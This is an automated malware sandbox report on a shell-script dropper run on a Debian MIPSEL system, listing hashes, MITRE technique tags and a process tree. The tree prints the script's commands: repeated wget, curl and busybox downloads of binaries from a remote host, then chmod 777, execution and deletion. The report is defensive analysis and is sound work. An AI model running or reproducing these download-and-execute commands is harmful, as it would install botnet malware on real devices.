0a6274806f6652419f244f55a7005eea47bcbc2332dc794c41cc60150bebff4c

Analysis

max time kernel
150s
max time network
155s
platform
debian-9_mipsel
resource
debian9-mipsel-20240226-en
resource tags

arch:mipselimage:debian9-mipsel-20240226-enkernel:4.9.0-13-4kc-maltalocale:en-usos:debian-9-mipselsystem
submitted
13/10/2024, 08:30

Sharing

Copy URL Twitter E-mail

Report Analysis Logs

General

Target

0a6274806f6652419f244f55a7005eea47bcbc2332dc794c41cc60150bebff4c.sh
Size

10KB
MD5

47efb477a21a4e8c58d9157a7a766ecc
SHA1

f6ec70eaf5cae2c7a6d388d0cdfd5e41f8401e90
SHA256

0a6274806f6652419f244f55a7005eea47bcbc2332dc794c41cc60150bebff4c
SHA512

5abba5b1a8b9a9d7dc111cb63bab0c59389ed81c81ef3e8ac44d596628eb9bdf8fccea3f8d1cfa0bca313b2237725a0dbcf88e0652eb2fc1a56db8c37b0fd706
SSDEEP

96:YLnALqihdzdPda77dUj/NYUBM6Z6x6H+KuLlFILueKLlFbrHUddEhokhoohoBoW/:n0usUH+KucuHfPsUH+KED

Score

7^/10

defense_evasion discovery

Malware Config

Signatures

File and Directory Permissions Modification 1 TTPs 22 IoCs

Adversaries may modify file or directory permissions to evade defenses.

defense_evasion

Linux and Mac File and Directory Permissions Modification

T1222.002

pid	Process
820	chmod
863	chmod
871	chmod
892	chmod
899	chmod
913	chmod
729	chmod
776	chmod
955	chmod
927	chmod
941	chmod
878	chmod
906	chmod
920	chmod
934	chmod
737	chmod
839	chmod
801	chmod
885	chmod
948	chmod
750	chmod
813	chmod

Executes dropped EXE 22 IoCs

Reads runtime system information 23 IoCs

Reads data from /proc virtual filesystem.

discovery

description	ioc	Process
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl

System Network Configuration Discovery 1 TTPs 64 IoCs

Adversaries may gather information about the network configuration of a system.

discovery

System Network Configuration Discovery

T1016

pid	Process
902	wget
903	curl
919	busybox
923	wget
926	busybox
817	curl
851	curl
870	busybox
901	rm
944	wget
726	busybox
747	busybox
819	busybox
884	busybox
954	busybox
958	wget
959	curl
860	busybox
905	busybox
867	wget
895	wget
937	wget
736	busybox
827	curl
773	busybox
810	curl
812	busybox
823	wget
881	wget
896	curl
706	wget
740	wget
952	curl
900	8MBDKLm0FP3DGmWa8dnIdSipQneweLhbFt
910	curl
874	wget
882	curl
887	rm
916	wget
924	curl
933	busybox
734	curl
845	wget
886	0sQwmn5EIp9dtUVeOBfB1sl11e7MG6ejMs
917	curl
940	busybox
816	wget
877	busybox
836	busybox
951	wget
717	curl
741	curl
931	curl
938	curl
807	wget
868	curl
786	curl
909	wget
798	busybox
912	busybox
930	wget
756	wget
781	wget
875	curl

Writes file to tmp directory 23 IoCs

Malware often drops required files in the /tmp directory.

description	ioc	Process
File opened for modification	/tmp/0sQwmn5EIp9dtUVeOBfB1sl11e7MG6ejMs	curl
File opened for modification	/tmp/axpDb75vO6RiaxFMfEco1fEwhJOAkt6xp0	curl
File opened for modification	/tmp/u8uTNxB3q6hm8F3HdfRK2rUd2oyhZjIsZR	curl
File opened for modification	/tmp/u8uTNxB3q6hm8F3HdfRK2rUd2oyhZjIsZR	curl
File opened for modification	/tmp/AtEVFz9qaEzuFEg8slphkHEmLHWAeeo5o9	curl
File opened for modification	/tmp/paZXKvInltPZZlgav8uxLyPSyDDbI3OtMd	curl
File opened for modification	/tmp/KD0UydW3nLYgTBdKMwh0v3TA9MepHRHMOW	curl
File opened for modification	/tmp/gSQeicNTZ5M2tjVGqMLdQ4tM8A2mUBTVpf	curl
File opened for modification	/tmp/MAbJpgeNRjeRlcWuLOrN5z56NYg80HfkB8	curl
File opened for modification	/tmp/vkjJMXgIk1bFBRbuWfsv4LdnjpjOqxHeTV	curl
File opened for modification	/tmp/MAbJpgeNRjeRlcWuLOrN5z56NYg80HfkB8	curl
File opened for modification	/tmp/KD0UydW3nLYgTBdKMwh0v3TA9MepHRHMOW	curl
File opened for modification	/tmp/gSQeicNTZ5M2tjVGqMLdQ4tM8A2mUBTVpf	curl
File opened for modification	/tmp/SlDj5TSJR6RylxfZ33QxzEv4UzoVlp55hq	curl
File opened for modification	/tmp/jl9G16g8UHzTTVgunll69zrWyh5XXTEArr	curl
File opened for modification	/tmp/XJIMlQ5yTC5UhM0563PzW7iOEkheGbOywX	curl
File opened for modification	/tmp/jl9G16g8UHzTTVgunll69zrWyh5XXTEArr	curl
File opened for modification	/tmp/paZXKvInltPZZlgav8uxLyPSyDDbI3OtMd	curl
File opened for modification	/tmp/rDsVFoROZ8zULsq0ECwC9PnFG07Hoftyha	curl
File opened for modification	/tmp/XJIMlQ5yTC5UhM0563PzW7iOEkheGbOywX	curl
File opened for modification	/tmp/8MBDKLm0FP3DGmWa8dnIdSipQneweLhbFt	curl
File opened for modification	/tmp/AtEVFz9qaEzuFEg8slphkHEmLHWAeeo5o9	curl
File opened for modification	/tmp/vkjJMXgIk1bFBRbuWfsv4LdnjpjOqxHeTV	curl

/tmp/0a6274806f6652419f244f55a7005eea47bcbc2332dc794c41cc60150bebff4c.sh
/tmp/0a6274806f6652419f244f55a7005eea47bcbc2332dc794c41cc60150bebff4c.sh
1⤵
PID:697
- /bin/rm
  /bin/rm bins.sh
  2⤵
  PID:699
- /usr/bin/wget
  wget http://conn.masjesu.zip/bins/rDsVFoROZ8zULsq0ECwC9PnFG07Hoftyha
  2⤵
  - System Network Configuration Discovery
  PID:706
- /usr/bin/curl
  curl -O http://conn.masjesu.zip/bins/rDsVFoROZ8zULsq0ECwC9PnFG07Hoftyha
  2⤵
  - Reads runtime system information
  - System Network Configuration Discovery
  - Writes file to tmp directory
  PID:717
- /bin/busybox
  /bin/busybox wget http://conn.masjesu.zip/bins/rDsVFoROZ8zULsq0ECwC9PnFG07Hoftyha
  2⤵
  - System Network Configuration Discovery
  PID:726
- /bin/chmod
  chmod 777 rDsVFoROZ8zULsq0ECwC9PnFG07Hoftyha
  2⤵
  - File and Directory Permissions Modification
  PID:729
- /tmp/rDsVFoROZ8zULsq0ECwC9PnFG07Hoftyha
  ./rDsVFoROZ8zULsq0ECwC9PnFG07Hoftyha
  2⤵
  - Executes dropped EXE
  PID:730
- /bin/rm
  rm rDsVFoROZ8zULsq0ECwC9PnFG07Hoftyha
  2⤵
  PID:731
- /usr/bin/wget
  wget http://conn.masjesu.zip/bins/SlDj5TSJR6RylxfZ33QxzEv4UzoVlp55hq
  2⤵
  PID:732
- /usr/bin/curl
  curl -O http://conn.masjesu.zip/bins/SlDj5TSJR6RylxfZ33QxzEv4UzoVlp55hq
  2⤵
  - Reads runtime system information
  - System Network Configuration Discovery
  - Writes file to tmp directory
  PID:734
- /bin/busybox
  /bin/busybox wget http://conn.masjesu.zip/bins/SlDj5TSJR6RylxfZ33QxzEv4UzoVlp55hq
  2⤵
  - System Network Configuration Discovery
  PID:736
- /bin/chmod
  chmod 777 SlDj5TSJR6RylxfZ33QxzEv4UzoVlp55hq
  2⤵
  - File and Directory Permissions Modification
  PID:737
- /tmp/SlDj5TSJR6RylxfZ33QxzEv4UzoVlp55hq
  ./SlDj5TSJR6RylxfZ33QxzEv4UzoVlp55hq
  2⤵
  - Executes dropped EXE
  PID:738
- /bin/rm
  rm SlDj5TSJR6RylxfZ33QxzEv4UzoVlp55hq
  2⤵
  PID:739
- /usr/bin/wget
  wget http://conn.masjesu.zip/bins/XJIMlQ5yTC5UhM0563PzW7iOEkheGbOywX
  2⤵
  - System Network Configuration Discovery
  PID:740
- /usr/bin/curl
  curl -O http://conn.masjesu.zip/bins/XJIMlQ5yTC5UhM0563PzW7iOEkheGbOywX
  2⤵
  - Reads runtime system information
  - System Network Configuration Discovery
  - Writes file to tmp directory
  PID:741
- /bin/busybox
  /bin/busybox wget http://conn.masjesu.zip/bins/XJIMlQ5yTC5UhM0563PzW7iOEkheGbOywX
  2⤵
  - System Network Configuration Discovery
  PID:747
- /bin/chmod
  chmod 777 XJIMlQ5yTC5UhM0563PzW7iOEkheGbOywX
  2⤵
  - File and Directory Permissions Modification
  PID:750
- /tmp/XJIMlQ5yTC5UhM0563PzW7iOEkheGbOywX
  ./XJIMlQ5yTC5UhM0563PzW7iOEkheGbOywX
  2⤵
  - Executes dropped EXE
  PID:751
- /bin/rm
  rm XJIMlQ5yTC5UhM0563PzW7iOEkheGbOywX
  2⤵
  PID:754
- /usr/bin/wget
  wget http://conn.masjesu.zip/bins/u8uTNxB3q6hm8F3HdfRK2rUd2oyhZjIsZR
  2⤵
  - System Network Configuration Discovery
  PID:756
- /usr/bin/curl
  curl -O http://conn.masjesu.zip/bins/u8uTNxB3q6hm8F3HdfRK2rUd2oyhZjIsZR
  2⤵
  - Reads runtime system information
  - Writes file to tmp directory
  PID:762
- /bin/busybox
  /bin/busybox wget http://conn.masjesu.zip/bins/u8uTNxB3q6hm8F3HdfRK2rUd2oyhZjIsZR
  2⤵
  - System Network Configuration Discovery
  PID:773
- /bin/chmod
  chmod 777 u8uTNxB3q6hm8F3HdfRK2rUd2oyhZjIsZR
  2⤵
  - File and Directory Permissions Modification
  PID:776
- /tmp/u8uTNxB3q6hm8F3HdfRK2rUd2oyhZjIsZR
  ./u8uTNxB3q6hm8F3HdfRK2rUd2oyhZjIsZR
  2⤵
  - Executes dropped EXE
  PID:777
- /bin/rm
  rm u8uTNxB3q6hm8F3HdfRK2rUd2oyhZjIsZR
  2⤵
  PID:780
- /usr/bin/wget
  wget http://conn.masjesu.zip/bins/AtEVFz9qaEzuFEg8slphkHEmLHWAeeo5o9
  2⤵
  - System Network Configuration Discovery
  PID:781
- /usr/bin/curl
  curl -O http://conn.masjesu.zip/bins/AtEVFz9qaEzuFEg8slphkHEmLHWAeeo5o9
  2⤵
  - Reads runtime system information
  - System Network Configuration Discovery
  - Writes file to tmp directory
  PID:786
- /bin/busybox
  /bin/busybox wget http://conn.masjesu.zip/bins/AtEVFz9qaEzuFEg8slphkHEmLHWAeeo5o9
  2⤵
  - System Network Configuration Discovery
  PID:798
- /bin/chmod
  chmod 777 AtEVFz9qaEzuFEg8slphkHEmLHWAeeo5o9
  2⤵
  - File and Directory Permissions Modification
  PID:801
- /tmp/AtEVFz9qaEzuFEg8slphkHEmLHWAeeo5o9
  ./AtEVFz9qaEzuFEg8slphkHEmLHWAeeo5o9
  2⤵
  - Executes dropped EXE
  PID:802
- /bin/rm
  rm AtEVFz9qaEzuFEg8slphkHEmLHWAeeo5o9
  2⤵
  PID:806
- /usr/bin/wget
  wget http://conn.masjesu.zip/bins/jl9G16g8UHzTTVgunll69zrWyh5XXTEArr
  2⤵
  - System Network Configuration Discovery
  PID:807
- /usr/bin/curl
  curl -O http://conn.masjesu.zip/bins/jl9G16g8UHzTTVgunll69zrWyh5XXTEArr
  2⤵
  - Reads runtime system information
  - System Network Configuration Discovery
  - Writes file to tmp directory
  PID:810
- /bin/busybox
  /bin/busybox wget http://conn.masjesu.zip/bins/jl9G16g8UHzTTVgunll69zrWyh5XXTEArr
  2⤵
  - System Network Configuration Discovery
  PID:812
- /bin/chmod
  chmod 777 jl9G16g8UHzTTVgunll69zrWyh5XXTEArr
  2⤵
  - File and Directory Permissions Modification
  PID:813
- /tmp/jl9G16g8UHzTTVgunll69zrWyh5XXTEArr
  ./jl9G16g8UHzTTVgunll69zrWyh5XXTEArr
  2⤵
  - Executes dropped EXE
  PID:814
- /bin/rm
  rm jl9G16g8UHzTTVgunll69zrWyh5XXTEArr
  2⤵
  PID:815
- /usr/bin/wget
  wget http://conn.masjesu.zip/bins/vkjJMXgIk1bFBRbuWfsv4LdnjpjOqxHeTV
  2⤵
  - System Network Configuration Discovery
  PID:816
- /usr/bin/curl
  curl -O http://conn.masjesu.zip/bins/vkjJMXgIk1bFBRbuWfsv4LdnjpjOqxHeTV
  2⤵
  - Reads runtime system information
  - System Network Configuration Discovery
  - Writes file to tmp directory
  PID:817
- /bin/busybox
  /bin/busybox wget http://conn.masjesu.zip/bins/vkjJMXgIk1bFBRbuWfsv4LdnjpjOqxHeTV
  2⤵
  - System Network Configuration Discovery
  PID:819
- /bin/chmod
  chmod 777 vkjJMXgIk1bFBRbuWfsv4LdnjpjOqxHeTV
  2⤵
  - File and Directory Permissions Modification
  PID:820
- /tmp/vkjJMXgIk1bFBRbuWfsv4LdnjpjOqxHeTV
  ./vkjJMXgIk1bFBRbuWfsv4LdnjpjOqxHeTV
  2⤵
  - Executes dropped EXE
  PID:821
- /bin/rm
  rm vkjJMXgIk1bFBRbuWfsv4LdnjpjOqxHeTV
  2⤵
  PID:822
- /usr/bin/wget
  wget http://conn.masjesu.zip/bins/paZXKvInltPZZlgav8uxLyPSyDDbI3OtMd
  2⤵
  - System Network Configuration Discovery
  PID:823
- /usr/bin/curl
  curl -O http://conn.masjesu.zip/bins/paZXKvInltPZZlgav8uxLyPSyDDbI3OtMd
  2⤵
  - Reads runtime system information
  - System Network Configuration Discovery
  - Writes file to tmp directory
  PID:827
- /bin/busybox
  /bin/busybox wget http://conn.masjesu.zip/bins/paZXKvInltPZZlgav8uxLyPSyDDbI3OtMd
  2⤵
  - System Network Configuration Discovery
  PID:836
- /bin/chmod
  chmod 777 paZXKvInltPZZlgav8uxLyPSyDDbI3OtMd
  2⤵
  - File and Directory Permissions Modification
  PID:839
- /tmp/paZXKvInltPZZlgav8uxLyPSyDDbI3OtMd
  ./paZXKvInltPZZlgav8uxLyPSyDDbI3OtMd
  2⤵
  - Executes dropped EXE
  PID:840
- /bin/rm
  rm paZXKvInltPZZlgav8uxLyPSyDDbI3OtMd
  2⤵
  PID:843
- /usr/bin/wget
  wget http://conn.masjesu.zip/bins/MAbJpgeNRjeRlcWuLOrN5z56NYg80HfkB8
  2⤵
  - System Network Configuration Discovery
  PID:845
- /usr/bin/curl
  curl -O http://conn.masjesu.zip/bins/MAbJpgeNRjeRlcWuLOrN5z56NYg80HfkB8
  2⤵
  - Reads runtime system information
  - System Network Configuration Discovery
  - Writes file to tmp directory
  PID:851
- /bin/busybox
  /bin/busybox wget http://conn.masjesu.zip/bins/MAbJpgeNRjeRlcWuLOrN5z56NYg80HfkB8
  2⤵
  - System Network Configuration Discovery
  PID:860
- /bin/chmod
  chmod 777 MAbJpgeNRjeRlcWuLOrN5z56NYg80HfkB8
  2⤵
  - File and Directory Permissions Modification
  PID:863
- /tmp/MAbJpgeNRjeRlcWuLOrN5z56NYg80HfkB8
  ./MAbJpgeNRjeRlcWuLOrN5z56NYg80HfkB8
  2⤵
  - Executes dropped EXE
  PID:865
- /bin/rm
  rm MAbJpgeNRjeRlcWuLOrN5z56NYg80HfkB8
  2⤵
  PID:866
- /usr/bin/wget
  wget http://conn.masjesu.zip/bins/KD0UydW3nLYgTBdKMwh0v3TA9MepHRHMOW
  2⤵
  - System Network Configuration Discovery
  PID:867
- /usr/bin/curl
  curl -O http://conn.masjesu.zip/bins/KD0UydW3nLYgTBdKMwh0v3TA9MepHRHMOW
  2⤵
  - Reads runtime system information
  - System Network Configuration Discovery
  - Writes file to tmp directory
  PID:868
- /bin/busybox
  /bin/busybox wget http://conn.masjesu.zip/bins/KD0UydW3nLYgTBdKMwh0v3TA9MepHRHMOW
  2⤵
  - System Network Configuration Discovery
  PID:870
- /bin/chmod
  chmod 777 KD0UydW3nLYgTBdKMwh0v3TA9MepHRHMOW
  2⤵
  - File and Directory Permissions Modification
  PID:871
- /tmp/KD0UydW3nLYgTBdKMwh0v3TA9MepHRHMOW
  ./KD0UydW3nLYgTBdKMwh0v3TA9MepHRHMOW
  2⤵
  - Executes dropped EXE
  PID:872
- /bin/rm
  rm KD0UydW3nLYgTBdKMwh0v3TA9MepHRHMOW
  2⤵
  PID:873
- /usr/bin/wget
  wget http://conn.masjesu.zip/bins/gSQeicNTZ5M2tjVGqMLdQ4tM8A2mUBTVpf
  2⤵
  - System Network Configuration Discovery
  PID:874
- /usr/bin/curl
  curl -O http://conn.masjesu.zip/bins/gSQeicNTZ5M2tjVGqMLdQ4tM8A2mUBTVpf
  2⤵
  - Reads runtime system information
  - System Network Configuration Discovery
  - Writes file to tmp directory
  PID:875
- /bin/busybox
  /bin/busybox wget http://conn.masjesu.zip/bins/gSQeicNTZ5M2tjVGqMLdQ4tM8A2mUBTVpf
  2⤵
  - System Network Configuration Discovery
  PID:877
- /bin/chmod
  chmod 777 gSQeicNTZ5M2tjVGqMLdQ4tM8A2mUBTVpf
  2⤵
  - File and Directory Permissions Modification
  PID:878
- /tmp/gSQeicNTZ5M2tjVGqMLdQ4tM8A2mUBTVpf
  ./gSQeicNTZ5M2tjVGqMLdQ4tM8A2mUBTVpf
  2⤵
  - Executes dropped EXE
  PID:879
- /bin/rm
  rm gSQeicNTZ5M2tjVGqMLdQ4tM8A2mUBTVpf
  2⤵
  PID:880
- /usr/bin/wget
  wget http://conn.masjesu.zip/bins/0sQwmn5EIp9dtUVeOBfB1sl11e7MG6ejMs
  2⤵
  - System Network Configuration Discovery
  PID:881
- /usr/bin/curl
  curl -O http://conn.masjesu.zip/bins/0sQwmn5EIp9dtUVeOBfB1sl11e7MG6ejMs
  2⤵
  - Reads runtime system information
  - System Network Configuration Discovery
  - Writes file to tmp directory
  PID:882
- /bin/busybox
  /bin/busybox wget http://conn.masjesu.zip/bins/0sQwmn5EIp9dtUVeOBfB1sl11e7MG6ejMs
  2⤵
  - System Network Configuration Discovery
  PID:884
- /bin/chmod
  chmod 777 0sQwmn5EIp9dtUVeOBfB1sl11e7MG6ejMs
  2⤵
  - File and Directory Permissions Modification
  PID:885
- /tmp/0sQwmn5EIp9dtUVeOBfB1sl11e7MG6ejMs
  ./0sQwmn5EIp9dtUVeOBfB1sl11e7MG6ejMs
  2⤵
  - Executes dropped EXE
  - System Network Configuration Discovery
  PID:886
- /bin/rm
  rm 0sQwmn5EIp9dtUVeOBfB1sl11e7MG6ejMs
  2⤵
  - System Network Configuration Discovery
  PID:887
- /usr/bin/wget
  wget http://conn.masjesu.zip/bins/axpDb75vO6RiaxFMfEco1fEwhJOAkt6xp0
  2⤵
  PID:888
- /usr/bin/curl
  curl -O http://conn.masjesu.zip/bins/axpDb75vO6RiaxFMfEco1fEwhJOAkt6xp0
  2⤵
  - Reads runtime system information
  - Writes file to tmp directory
  PID:889
- /bin/busybox
  /bin/busybox wget http://conn.masjesu.zip/bins/axpDb75vO6RiaxFMfEco1fEwhJOAkt6xp0
  2⤵
  PID:891
- /bin/chmod
  chmod 777 axpDb75vO6RiaxFMfEco1fEwhJOAkt6xp0
  2⤵
  - File and Directory Permissions Modification
  PID:892
- /tmp/axpDb75vO6RiaxFMfEco1fEwhJOAkt6xp0
  ./axpDb75vO6RiaxFMfEco1fEwhJOAkt6xp0
  2⤵
  - Executes dropped EXE
  PID:893
- /bin/rm
  rm axpDb75vO6RiaxFMfEco1fEwhJOAkt6xp0
  2⤵
  PID:894
- /usr/bin/wget
  wget http://conn.masjesu.zip/bins/8MBDKLm0FP3DGmWa8dnIdSipQneweLhbFt
  2⤵
  - System Network Configuration Discovery
  PID:895
- /usr/bin/curl
  curl -O http://conn.masjesu.zip/bins/8MBDKLm0FP3DGmWa8dnIdSipQneweLhbFt
  2⤵
  - Reads runtime system information
  - System Network Configuration Discovery
  - Writes file to tmp directory
  PID:896
- /bin/busybox
  /bin/busybox wget http://conn.masjesu.zip/bins/8MBDKLm0FP3DGmWa8dnIdSipQneweLhbFt
  2⤵
  PID:898
- /bin/chmod
  chmod 777 8MBDKLm0FP3DGmWa8dnIdSipQneweLhbFt
  2⤵
  - File and Directory Permissions Modification
  PID:899
- /tmp/8MBDKLm0FP3DGmWa8dnIdSipQneweLhbFt
  ./8MBDKLm0FP3DGmWa8dnIdSipQneweLhbFt
  2⤵
  - Executes dropped EXE
  - System Network Configuration Discovery
  PID:900
- /bin/rm
  rm 8MBDKLm0FP3DGmWa8dnIdSipQneweLhbFt
  2⤵
  - System Network Configuration Discovery
  PID:901
- /usr/bin/wget
  wget http://conn.masjesu.zip/bins/XJIMlQ5yTC5UhM0563PzW7iOEkheGbOywX
  2⤵
  - System Network Configuration Discovery
  PID:902
- /usr/bin/curl
  curl -O http://conn.masjesu.zip/bins/XJIMlQ5yTC5UhM0563PzW7iOEkheGbOywX
  2⤵
  - Reads runtime system information
  - System Network Configuration Discovery
  - Writes file to tmp directory
  PID:903
- /bin/busybox
  /bin/busybox wget http://conn.masjesu.zip/bins/XJIMlQ5yTC5UhM0563PzW7iOEkheGbOywX
  2⤵
  - System Network Configuration Discovery
  PID:905
- /bin/chmod
  chmod 777 XJIMlQ5yTC5UhM0563PzW7iOEkheGbOywX
  2⤵
  - File and Directory Permissions Modification
  PID:906
- /tmp/XJIMlQ5yTC5UhM0563PzW7iOEkheGbOywX
  ./XJIMlQ5yTC5UhM0563PzW7iOEkheGbOywX
  2⤵
  - Executes dropped EXE
  PID:907
- /bin/rm
  rm XJIMlQ5yTC5UhM0563PzW7iOEkheGbOywX
  2⤵
  PID:908
- /usr/bin/wget
  wget http://conn.masjesu.zip/bins/u8uTNxB3q6hm8F3HdfRK2rUd2oyhZjIsZR
  2⤵
  - System Network Configuration Discovery
  PID:909
- /usr/bin/curl
  curl -O http://conn.masjesu.zip/bins/u8uTNxB3q6hm8F3HdfRK2rUd2oyhZjIsZR
  2⤵
  - Reads runtime system information
  - System Network Configuration Discovery
  - Writes file to tmp directory
  PID:910
- /bin/busybox
  /bin/busybox wget http://conn.masjesu.zip/bins/u8uTNxB3q6hm8F3HdfRK2rUd2oyhZjIsZR
  2⤵
  - System Network Configuration Discovery
  PID:912
- /bin/chmod
  chmod 777 u8uTNxB3q6hm8F3HdfRK2rUd2oyhZjIsZR
  2⤵
  - File and Directory Permissions Modification
  PID:913
- /tmp/u8uTNxB3q6hm8F3HdfRK2rUd2oyhZjIsZR
  ./u8uTNxB3q6hm8F3HdfRK2rUd2oyhZjIsZR
  2⤵
  - Executes dropped EXE
  PID:914
- /bin/rm
  rm u8uTNxB3q6hm8F3HdfRK2rUd2oyhZjIsZR
  2⤵
  PID:915
- /usr/bin/wget
  wget http://conn.masjesu.zip/bins/AtEVFz9qaEzuFEg8slphkHEmLHWAeeo5o9
  2⤵
  - System Network Configuration Discovery
  PID:916
- /usr/bin/curl
  curl -O http://conn.masjesu.zip/bins/AtEVFz9qaEzuFEg8slphkHEmLHWAeeo5o9
  2⤵
  - Reads runtime system information
  - System Network Configuration Discovery
  - Writes file to tmp directory
  PID:917
- /bin/busybox
  /bin/busybox wget http://conn.masjesu.zip/bins/AtEVFz9qaEzuFEg8slphkHEmLHWAeeo5o9
  2⤵
  - System Network Configuration Discovery
  PID:919
- /bin/chmod
  chmod 777 AtEVFz9qaEzuFEg8slphkHEmLHWAeeo5o9
  2⤵
  - File and Directory Permissions Modification
  PID:920
- /tmp/AtEVFz9qaEzuFEg8slphkHEmLHWAeeo5o9
  ./AtEVFz9qaEzuFEg8slphkHEmLHWAeeo5o9
  2⤵
  - Executes dropped EXE
  PID:921
- /bin/rm
  rm AtEVFz9qaEzuFEg8slphkHEmLHWAeeo5o9
  2⤵
  PID:922
- /usr/bin/wget
  wget http://conn.masjesu.zip/bins/jl9G16g8UHzTTVgunll69zrWyh5XXTEArr
  2⤵
  - System Network Configuration Discovery
  PID:923
- /usr/bin/curl
  curl -O http://conn.masjesu.zip/bins/jl9G16g8UHzTTVgunll69zrWyh5XXTEArr
  2⤵
  - Reads runtime system information
  - System Network Configuration Discovery
  - Writes file to tmp directory
  PID:924
- /bin/busybox
  /bin/busybox wget http://conn.masjesu.zip/bins/jl9G16g8UHzTTVgunll69zrWyh5XXTEArr
  2⤵
  - System Network Configuration Discovery
  PID:926
- /bin/chmod
  chmod 777 jl9G16g8UHzTTVgunll69zrWyh5XXTEArr
  2⤵
  - File and Directory Permissions Modification
  PID:927
- /tmp/jl9G16g8UHzTTVgunll69zrWyh5XXTEArr
  ./jl9G16g8UHzTTVgunll69zrWyh5XXTEArr
  2⤵
  - Executes dropped EXE
  PID:928
- /bin/rm
  rm jl9G16g8UHzTTVgunll69zrWyh5XXTEArr
  2⤵
  PID:929
- /usr/bin/wget
  wget http://conn.masjesu.zip/bins/vkjJMXgIk1bFBRbuWfsv4LdnjpjOqxHeTV
  2⤵
  - System Network Configuration Discovery
  PID:930
- /usr/bin/curl
  curl -O http://conn.masjesu.zip/bins/vkjJMXgIk1bFBRbuWfsv4LdnjpjOqxHeTV
  2⤵
  - Reads runtime system information
  - System Network Configuration Discovery
  - Writes file to tmp directory
  PID:931
- /bin/busybox
  /bin/busybox wget http://conn.masjesu.zip/bins/vkjJMXgIk1bFBRbuWfsv4LdnjpjOqxHeTV
  2⤵
  - System Network Configuration Discovery
  PID:933
- /bin/chmod
  chmod 777 vkjJMXgIk1bFBRbuWfsv4LdnjpjOqxHeTV
  2⤵
  - File and Directory Permissions Modification
  PID:934
- /tmp/vkjJMXgIk1bFBRbuWfsv4LdnjpjOqxHeTV
  ./vkjJMXgIk1bFBRbuWfsv4LdnjpjOqxHeTV
  2⤵
  - Executes dropped EXE
  PID:935
- /bin/rm
  rm vkjJMXgIk1bFBRbuWfsv4LdnjpjOqxHeTV
  2⤵
  PID:936
- /usr/bin/wget
  wget http://conn.masjesu.zip/bins/paZXKvInltPZZlgav8uxLyPSyDDbI3OtMd
  2⤵
  - System Network Configuration Discovery
  PID:937
- /usr/bin/curl
  curl -O http://conn.masjesu.zip/bins/paZXKvInltPZZlgav8uxLyPSyDDbI3OtMd
  2⤵
  - Reads runtime system information
  - System Network Configuration Discovery
  - Writes file to tmp directory
  PID:938
- /bin/busybox
  /bin/busybox wget http://conn.masjesu.zip/bins/paZXKvInltPZZlgav8uxLyPSyDDbI3OtMd
  2⤵
  - System Network Configuration Discovery
  PID:940
- /bin/chmod
  chmod 777 paZXKvInltPZZlgav8uxLyPSyDDbI3OtMd
  2⤵
  - File and Directory Permissions Modification
  PID:941
- /tmp/paZXKvInltPZZlgav8uxLyPSyDDbI3OtMd
  ./paZXKvInltPZZlgav8uxLyPSyDDbI3OtMd
  2⤵
  - Executes dropped EXE
  PID:942
- /bin/rm
  rm paZXKvInltPZZlgav8uxLyPSyDDbI3OtMd
  2⤵
  PID:943
- /usr/bin/wget
  wget http://conn.masjesu.zip/bins/MAbJpgeNRjeRlcWuLOrN5z56NYg80HfkB8
  2⤵
  - System Network Configuration Discovery
  PID:944
- /usr/bin/curl
  curl -O http://conn.masjesu.zip/bins/MAbJpgeNRjeRlcWuLOrN5z56NYg80HfkB8
  2⤵
  - Reads runtime system information
  - Writes file to tmp directory
  PID:945
- /bin/busybox
  /bin/busybox wget http://conn.masjesu.zip/bins/MAbJpgeNRjeRlcWuLOrN5z56NYg80HfkB8
  2⤵
  PID:947
- /bin/chmod
  chmod 777 MAbJpgeNRjeRlcWuLOrN5z56NYg80HfkB8
  2⤵
  - File and Directory Permissions Modification
  PID:948
- /tmp/MAbJpgeNRjeRlcWuLOrN5z56NYg80HfkB8
  ./MAbJpgeNRjeRlcWuLOrN5z56NYg80HfkB8
  2⤵
  - Executes dropped EXE
  PID:949
- /bin/rm
  rm MAbJpgeNRjeRlcWuLOrN5z56NYg80HfkB8
  2⤵
  PID:950
- /usr/bin/wget
  wget http://conn.masjesu.zip/bins/KD0UydW3nLYgTBdKMwh0v3TA9MepHRHMOW
  2⤵
  - System Network Configuration Discovery
  PID:951
- /usr/bin/curl
  curl -O http://conn.masjesu.zip/bins/KD0UydW3nLYgTBdKMwh0v3TA9MepHRHMOW
  2⤵
  - Reads runtime system information
  - System Network Configuration Discovery
  - Writes file to tmp directory
  PID:952
- /bin/busybox
  /bin/busybox wget http://conn.masjesu.zip/bins/KD0UydW3nLYgTBdKMwh0v3TA9MepHRHMOW
  2⤵
  - System Network Configuration Discovery
  PID:954
- /bin/chmod
  chmod 777 KD0UydW3nLYgTBdKMwh0v3TA9MepHRHMOW
  2⤵
  - File and Directory Permissions Modification
  PID:955
- /tmp/KD0UydW3nLYgTBdKMwh0v3TA9MepHRHMOW
  ./KD0UydW3nLYgTBdKMwh0v3TA9MepHRHMOW
  2⤵
  - Executes dropped EXE
  PID:956
- /bin/rm
  rm KD0UydW3nLYgTBdKMwh0v3TA9MepHRHMOW
  2⤵
  PID:957
- /usr/bin/wget
  wget http://conn.masjesu.zip/bins/gSQeicNTZ5M2tjVGqMLdQ4tM8A2mUBTVpf
  2⤵
  - System Network Configuration Discovery
  PID:958
- /usr/bin/curl
  curl -O http://conn.masjesu.zip/bins/gSQeicNTZ5M2tjVGqMLdQ4tM8A2mUBTVpf
  2⤵
